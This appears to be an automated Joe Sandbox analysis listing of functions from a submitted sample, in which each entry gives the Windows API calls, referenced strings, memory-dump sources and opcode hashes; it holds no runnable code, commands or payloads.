Function 00676369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667896,?,?,00000000), ref: 00605A2C
Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667896,?,?,00000000,?,?), ref: 00605A50

gethostbyname.WSOCK32(?,?,?), ref: 00676399
WSAGetLastError.WSOCK32(00000000), ref: 006763A4
_memmove.LIBCMT ref: 006763D1
inet_ntoa.WSOCK32(?), ref: 006763DC

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: b6ae99012836a577ab9c103c046545f5b70bb46745b8d627930b57c2f53b87bc
Instruction ID: 69b8877d4d16c5fdb01c5bf5a6ca9d222396dd2e42b8200c6e3f679d38b14e03
Opcode Fuzzy Hash: b6ae99012836a577ab9c103c046545f5b70bb46745b8d627930b57c2f53b87bc
Instruction Fuzzy Hash: 5A115E71600109AFCB44FBA4DD46CEFB7BAAF04310B148169F506A72A2DB30AE14CB65

Function 00658B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00658B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00658B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00658B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00658BA4

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8c46b2523b04225db20c5479b40b299e5b6f4ddd944c84921347660d180f21d7
Instruction ID: ed25ceecce4452de76d06c9245664a90ea619538e5640a21d3600b537929cd5b
Opcode Fuzzy Hash: 8c46b2523b04225db20c5479b40b299e5b6f4ddd944c84921347660d180f21d7
Instruction Fuzzy Hash: 2F115A79900218FFEB10DFA5CC84FADBBB9FB48710F2041A5EA00B7290DA716E11DB94

Function 00601290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623

DefDlgProcW.USER32(?,00000020,?), ref: 006012D8
GetClientRect.USER32(?,?), ref: 0063B5FB
GetCursorPos.USER32(?), ref: 0063B605
ScreenToClient.USER32(?,?), ref: 0063B610

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 6f277c0608e9b45442829097c78cfc7b134d761326581643355e6ebb46fc0feb
Instruction ID: 6565082bb7d050af87bcee1eb824b63e7bb8c9aaefa56a5e8b67486dc3aef6a7
Opcode Fuzzy Hash: 6f277c0608e9b45442829097c78cfc7b134d761326581643355e6ebb46fc0feb
Instruction Fuzzy Hash: 76112835540019FBCB04EFA8D8899FF77BAEB06300F400956F901EB280D730BA918BA9

Function 0065D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0065D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0065D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0065D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0065D897

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: ff2082c738179c3bc109dcff6ae8d5051185d277ba145c89260e11fc47c9cebd
Instruction ID: cf2e36bd052bf1bd8fbe31e50e4dc50707e991c20b04965a72ac73ca041ab04d
Opcode Fuzzy Hash: ff2082c738179c3bc109dcff6ae8d5051185d277ba145c89260e11fc47c9cebd
Instruction Fuzzy Hash: 1E116175605304EBE3308F50EC08F93BBFDEB00B01F108669EA56D6191D7B0E54D9BA1

Function 00636FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00636FDB

Part of subcall function 006376C2: __fltout2.LIBCMT ref: 006376EB

__cftog_l.LIBCMT ref: 00637001
__cftoe_l.LIBCMT ref: 00637033

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 08969cc09e878bfd8bd64d642ecc52c1ac7d2e8e3240887de56167f6d13ea632
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: E2014BB244814ABBCF2A5E84CC42CEE3F63BB18355F588419FA1859131D336C9B1ABC1

Function 0068B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0068B2E4
ScreenToClient.USER32(?,?), ref: 0068B2FC
ScreenToClient.USER32(?,?), ref: 0068B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0068B33B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 126695cca00ab864e1046336968bfff823e785cabdd926b0d97c70332b3bb4f4
Instruction ID: 0c251d402c38dffd67d90344942c12c6431808eb806d8f8d1b83a162710d9f2a
Opcode Fuzzy Hash: 126695cca00ab864e1046336968bfff823e785cabdd926b0d97c70332b3bb4f4
Instruction Fuzzy Hash: AD114775D00209EFDB41DF99C4449EEBBF5FF18310F105266E914E3220D735AA558F50

Function 00666BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00666BE6

Part of subcall function 006676C4: _memset.LIBCMT ref: 006676F9

_memmove.LIBCMT ref: 00666C09
_memset.LIBCMT ref: 00666C16
LeaveCriticalSection.KERNEL32(?), ref: 00666C26

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: f7908b1ba95ae0818f44ba77368652dec90e3740b665d4c7344aafe68e6778ea
Instruction ID: 33b7a9c0201ac74b8bdd42d3d231617d32361a07fb0c305627dd4164f1a50829
Opcode Fuzzy Hash: f7908b1ba95ae0818f44ba77368652dec90e3740b665d4c7344aafe68e6778ea
Instruction Fuzzy Hash: 58F0543A100110BBCF416F95EC85A4ABF2AEF45321F048065FE085F227D735E911CBB8

Function 00602218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00602231
SetTextColor.GDI32(?,000000FF), ref: 0060223B
SetBkMode.GDI32(?,00000001), ref: 00602250
GetStockObject.GDI32(00000005), ref: 00602258
GetWindowDC.USER32(?,00000000), ref: 0063BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0063BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0063BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0063BEC2
GetPixel.GDI32(00000000,?,?), ref: 0063BEE2
ReleaseDC.USER32(?,00000000), ref: 0063BEED

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: d221879e6a647d5ed4cd63a568d62eebff98431ac6ac4221c467f44c99d33133
Instruction ID: 636e604438b3215f59625b33db8e7e2773e3feafd5c93369c3aa31ec89faa692
Opcode Fuzzy Hash: d221879e6a647d5ed4cd63a568d62eebff98431ac6ac4221c467f44c99d33133
Instruction Fuzzy Hash: 8CE06D32104244FADF215FA8FC4D7D83F12EB15332F109366FBA9480E187B24990DB12

Function 00658712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0065871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,006582E6), ref: 00658722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006582E6), ref: 0065872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,006582E6), ref: 00658736

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c5ba36164e31158411c99a2121a1fe01256b7b14ab0bd49183cddfc5c26af475
Instruction ID: 6fb67b8963df39ad7ab972e62aa0b4e1de1b7e7406cd3448c70dd169b171bce9
Opcode Fuzzy Hash: c5ba36164e31158411c99a2121a1fe01256b7b14ab0bd49183cddfc5c26af475
Instruction Fuzzy Hash: 5EE08636611311BFD7205FB05D0CF9A3BAEEF54792F244828B685DA050DA348445C750

Function 00606240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%i, xrefs: 0060624E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID: %i
API String ID: 0-950836615
Opcode ID: 91ea99809a94026c8cecb5e910bc1c611c2f579efc0d91b999032a40b07cd7f8
Instruction ID: e71b1b1610e07d19ac7cc14be03781cfe7775cbe22044f0fc4712b6edf3fdd89
Opcode Fuzzy Hash: 91ea99809a94026c8cecb5e910bc1c611c2f579efc0d91b999032a40b07cd7f8
Instruction Fuzzy Hash: 4DB19F758801099ACF2CEF94C8859FFB7B6EF44310F10502AF942A72D1DB749EA6CB95

Function 0067AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0067AFAE

Strings

xbl, xrefs: 0067B010
xbl, xrefs: 0067AFE4

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __itow_s
String ID: xbl$xbl
API String ID: 3653519197-1030246648
Opcode ID: a8e05920af98bb9eec0709a4aa3d45d79bce33106dfd60b513e00769b50668fd
Instruction ID: b03351613ab86f88b4691120ac76b931ff5207815ba76def8d3bc8f769f5eaac
Opcode Fuzzy Hash: a8e05920af98bb9eec0709a4aa3d45d79bce33106dfd60b513e00769b50668fd
Instruction Fuzzy Hash: 74B15C70A00109AFCB14DF54C891EAEBBBAEF58310F14D559F9499B291EB30E981CB64

Function 0066AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0061FC86: _wcscpy.LIBCMT ref: 0061FCA9

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

__wcsnicmp.LIBCMT ref: 0066B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0066B0F6

Strings

LPT, xrefs: 0066B027

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 12bad4bcfd005e8b3a31847ee4f6f333f75c9b163104993cbcaff634c9b1b692
Instruction ID: 2fc8bc0b06e334cf77f101a4be50f1fa863a76e16a3f997e98e98349af194e41
Opcode Fuzzy Hash: 12bad4bcfd005e8b3a31847ee4f6f333f75c9b163104993cbcaff634c9b1b692
Instruction Fuzzy Hash: 43617D75A00215EFCB18DF94C891EEEB7B6EB09310F108069F916EB391D770AE85CB94

Function 00612957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00612968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00612981

Strings

@, xrefs: 00612975

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a6206e4dca1706d55234906acbc814caa728452b09ae4f267d936190ec39b216
Instruction ID: e3065e7645aa87ec1f84c47c98a0a5612aca28f64a3f89f1ab1c8e6bd5e14bcf
Opcode Fuzzy Hash: a6206e4dca1706d55234906acbc814caa728452b09ae4f267d936190ec39b216
Instruction Fuzzy Hash: 3B5146714087449BD360EF14DC86BABBBE9FB85340F41895DF2D8411A2EF709529CB6A

Function 00669734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00604F0B: __fread_nolock.LIBCMT ref: 00604F29

_wcscmp.LIBCMT ref: 00669824
_wcscmp.LIBCMT ref: 00669837

Strings

FILE, xrefs: 00669770

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: afc6870817973a3d0635648e56a21a80a845e26ac3f363192f29c59c70f53a84
Instruction ID: 529001159132c59bb819c51372f93e8189ec8d14cfa6fb423b235a6f8945fd81
Opcode Fuzzy Hash: afc6870817973a3d0635648e56a21a80a845e26ac3f363192f29c59c70f53a84
Instruction Fuzzy Hash: FB419671A4021ABADF259AA4CC45FEFBBBEDF85710F00046DFA04E7181DA71A9058BA5

Function 00640574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0064057F

Strings

Ddl, xrefs: 0060A317
Ddl, xrefs: 0060A151

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClearVariant
String ID: Ddl$Ddl
API String ID: 1473721057-4292462513
Opcode ID: 7761c943ec276d6c0f28e59e49b886edf7d6d32b8f3222a9426f45ac6138c6aa
Instruction ID: aa3d133a4e4f26229edc09759adec29e71a0fc6bf626ed2f4f30444eab999ff9
Opcode Fuzzy Hash: 7761c943ec276d6c0f28e59e49b886edf7d6d32b8f3222a9426f45ac6138c6aa
Instruction Fuzzy Hash: FE51D2786443419FD758CF58C580A6ABBF3FB99394F54885DF9858B3A1D331E881CB82

Function 0067258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0067259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006725D4

Strings

|, xrefs: 006725A5

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 5addab64d34a02937c9c5ac4c471809b940a37247abe407be0b0bc96f2208a16
Instruction ID: 02ff339087a6669b6755f8ff0343d9e63e1fbd2c1e30907ee5c9eecaf3303055
Opcode Fuzzy Hash: 5addab64d34a02937c9c5ac4c471809b940a37247abe407be0b0bc96f2208a16
Instruction Fuzzy Hash: 1C312771D0011AABCF55AFA0CC85EEEBBBAFF08340F10405AE919A6162DB315916DB64

Function 00687A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00687B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00687B76

Strings

', xrefs: 00687ACA

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 8ed5bd0adf2e25d17fd5a4251d5534aeb3acbded5a7349522d3014fe43a97eec
Instruction ID: 17ba11138a760a7aeed7d5dc51910ddde4f7d6f6ddce7144fe40f704a52b29a0
Opcode Fuzzy Hash: 8ed5bd0adf2e25d17fd5a4251d5534aeb3acbded5a7349522d3014fe43a97eec
Instruction Fuzzy Hash: F041E774A0520A9FDB14DF64C981BEABBB6FB09300F24026AE905AB391D771A951DF90

Function 00686A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00686B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00686B53

Strings

static, xrefs: 00686AB3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 232df75c5a574c96a3e4b6a926ae8b0b97a0f444c59fd74a2149b4d5a2cb7855
Instruction ID: 68b4ec8486ff3cb14972b2ccedb0892ddf7ea02ef28046c9aa1e051dac82e026
Opcode Fuzzy Hash: 232df75c5a574c96a3e4b6a926ae8b0b97a0f444c59fd74a2149b4d5a2cb7855
Instruction Fuzzy Hash: 4A319E71200604AEDB14AF64CC81FFB73AAFF48764F10961DF9A5D7290DA71AC91C764

Function 006628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00662911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0066294C

Strings

0, xrefs: 0066290A

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
